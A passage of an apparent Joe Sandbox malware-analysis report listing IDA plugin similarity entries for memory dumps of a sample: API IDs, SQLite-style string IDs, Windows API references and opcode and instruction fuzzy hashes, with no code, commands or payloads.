                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                                                              • API String ID: 3510742995-3538577999
                                                                                                                                                                                                                                              • Opcode ID: 22d9235c68b45b7228f0ec18ec1eb6d2aaca4e5828faf460a6cdfe1562e0d8bb
                                                                                                                                                                                                                                              • Instruction ID: f45e864896b935ca52dd902098cdcc852616478e72e6da1c0fcf9688567e2e28
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22d9235c68b45b7228f0ec18ec1eb6d2aaca4e5828faf460a6cdfe1562e0d8bb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F551C129B0D69395FB6C9B659430A786791AF80B90F8841B1DE7D8F7CDDE3DE8429300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                                                              • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                                                                                                              • API String ID: 973152223-2471937615
                                                                                                                                                                                                                                              • Opcode ID: caf76fc990a77c24bd54f66fb3f334cef98837adf3bd70c06e3e0f200cd74bc1
                                                                                                                                                                                                                                              • Instruction ID: 0653d103c5dbdcdbd02464c12ddb9db8620756314b0aa76d781a2f40389462f7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: caf76fc990a77c24bd54f66fb3f334cef98837adf3bd70c06e3e0f200cd74bc1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0731B125B08A4286E7589F7AB520869B3A1EB84BD4F940275DE7C877DDDF7CD4418B00
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00007FFDFAB7CFB0: memset.VCRUNTIME140 ref: 00007FFDFAB7D013
                                                                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?,00000000,00007FFDFAB7E8DE), ref: 00007FFDFAB80652
                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,00000000,00007FFDFAB7E8DE), ref: 00007FFDFAB80671
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$AttributesDeletememset
                                                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
                                                                                                                                                                                                                                              • API String ID: 3962298889-1405699761
                                                                                                                                                                                                                                              • Opcode ID: 5896222049c449f5e65fa2e9f0d31338034f82ff5c2c51181ea19f40c999cb64
                                                                                                                                                                                                                                              • Instruction ID: a77fa14e2958b7af614c3b96515f2c938b147473792c9355c1100f0e5346e9fe
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5896222049c449f5e65fa2e9f0d31338034f82ff5c2c51181ea19f40c999cb64
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C416029B0C60382F75C9B2AA870D7C73A0AF85BD1F8445B5D97D4A6E9DF3CF4468600
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                                              • String ID: %s-shm$readonly_shm$winOpenShm
                                                                                                                                                                                                                                              • API String ID: 2221118986-2815843928
                                                                                                                                                                                                                                              • Opcode ID: b1f6e6c9280d3df84c61f73b632caf123fa54ca5261b8974bfa843b242bbbff8
                                                                                                                                                                                                                                              • Instruction ID: c5a431cf883206487f9fdd962cdb0e595b2185e4148bc7cba4757ba3e9f18c25
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1f6e6c9280d3df84c61f73b632caf123fa54ca5261b8974bfa843b242bbbff8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33C13A29B09A4282FB6C9B62B870A7D33A4FF44B54F8445B5DA7E467E8DF7CE4548300
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
                                                                                                                                                                                                                                              • API String ID: 0-3727861699
                                                                                                                                                                                                                                              • Opcode ID: 27111365c1df80b656e17f2dca393731bfbb6c87a57d4ce7fc26ae2753238598
                                                                                                                                                                                                                                              • Instruction ID: 3eafa96a732ac0be9897aa329a38e4cef172b3c83e4fedfef3450ef12e832212
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27111365c1df80b656e17f2dca393731bfbb6c87a57d4ce7fc26ae2753238598
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61717121B1A64281EB689F5AE460B7D63A1FB44B84F958079CA6D4B7DDDF3DE8438300
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                                              • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                              • Instruction ID: 2216d76958980a5a3c8be71cf2823cfd0165be765e6261f22fe8a7438c1f4697
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1510372F042118AEF18CF689D6B6BC27A1BF54378F140235ED1E92AE5DF3DA412CA01
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2780335769-0
                                                                                                                                                                                                                                              • Opcode ID: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
                                                                                                                                                                                                                                              • Instruction ID: a4e455abd21e01ec38651cc347f7c3c61b6c5436560bd97bca91e9b64e193112
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f2931e55a17fed7c801103cab28c1f7fd047901bf7fa79ea6702d423310ad099
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F519D22E086418AFF10DF75D85A3BD37B5BB48BA8F148435DE0D87688DF38D4618306
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                                              • Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                              • Instruction ID: da74af7f78e454ec7ea6ea347ac7f67e776f14112e1a4fa69cf558a7a62c2ca1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7741A162E1878283EB10DB20995A3697360FBA53B4F109335EA9C83AD1DF7CA4F18705
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _msizerealloc
                                                                                                                                                                                                                                              • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                                              • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                                              • Opcode ID: 75b8f79c93e6a993e734f7f3b378ef07c00aa82b64f7ca0c6d8950d914df2de2
                                                                                                                                                                                                                                              • Instruction ID: e7400748d3cc57c085494a7bbb99b6b0ea2f85891441300a1f75f940c81473c9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75b8f79c93e6a993e734f7f3b378ef07c00aa82b64f7ca0c6d8950d914df2de2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FE09219B0D78181EB584757B96097D5661AF4DFC0F4491B0EE6E0BB9DEF6CE4428300
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 941bd56ce30bcc552698f218a43f71aa885edf37cc679c2b2f93981d159a1d52
                                                                                                                                                                                                                                              • Instruction ID: c0098aabf084ad389889c16e552d4edefe7638c455ce77d1c4c535544cf7221e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 941bd56ce30bcc552698f218a43f71aa885edf37cc679c2b2f93981d159a1d52
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39C1D822B0858286E7689B2DD460A3D3791FF85B58F948175D96E8F7D8DE3DE842C700
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3251591375-0
                                                                                                                                                                                                                                              • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                              • Instruction ID: 8057bb0ef93e1debd6f95cbc3026028dcccac314c1d70477e347de350fcc6b8e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42318D21E0CA5749FE24AB299C273FD2681AF513A4F444034DE0EC72D7CF6EA884C25B
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                              • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                              • Instruction ID: d8cc47cb95edc8d5b6e99814b8124a7b7ae47c6e12d0ecac96a07b88ae943250
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04D09250B1874682EF183B786CAF17922556FADB31F152438CC1B86397EE6CA8698342
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                              • Instruction ID: 20db38ed7809fbb960a0fd1a024f07b8b62ca9bb570ee0efe15fd1e5edc95f29
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E515921B0964186FF299E259C0A67E6681BF45BB4F188734ED7D877C6CF3CE4218782
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                                              • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                              • Instruction ID: 3f47973824e9fa48d61ac8f515102cac9d0dc2d79e34c76bb2c5c3c73f37b923
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AD11C471618A8181DE208B29AC59169A361BB46FF4F544331EEBD877D9CE7CD0258742
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62C105839), ref: 00007FF62C105957
                                                                                                                                                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62C105839), ref: 00007FF62C10596D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2067330873.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067297322.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067374645.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1707611234-0
                                                                                                                                                                                                                                              • Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                              • Instruction ID: 27d3a395622cdf5dc4dcc8da4b465a5d3137a53a82e347f72bf959d8797b5173
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9111A07260CB5282EF648B18A81653AB7A0FB85B71F500236FA9DC19D8EF6CD064DF01
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                                                              • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                                              • API String ID: 2803490479-1168259600
                                                                                                                                                                                                                                              • Opcode ID: 74c318c544fdcdd5763c1011f60c09db72ac95fdcd372deb902ef073de02fd8d
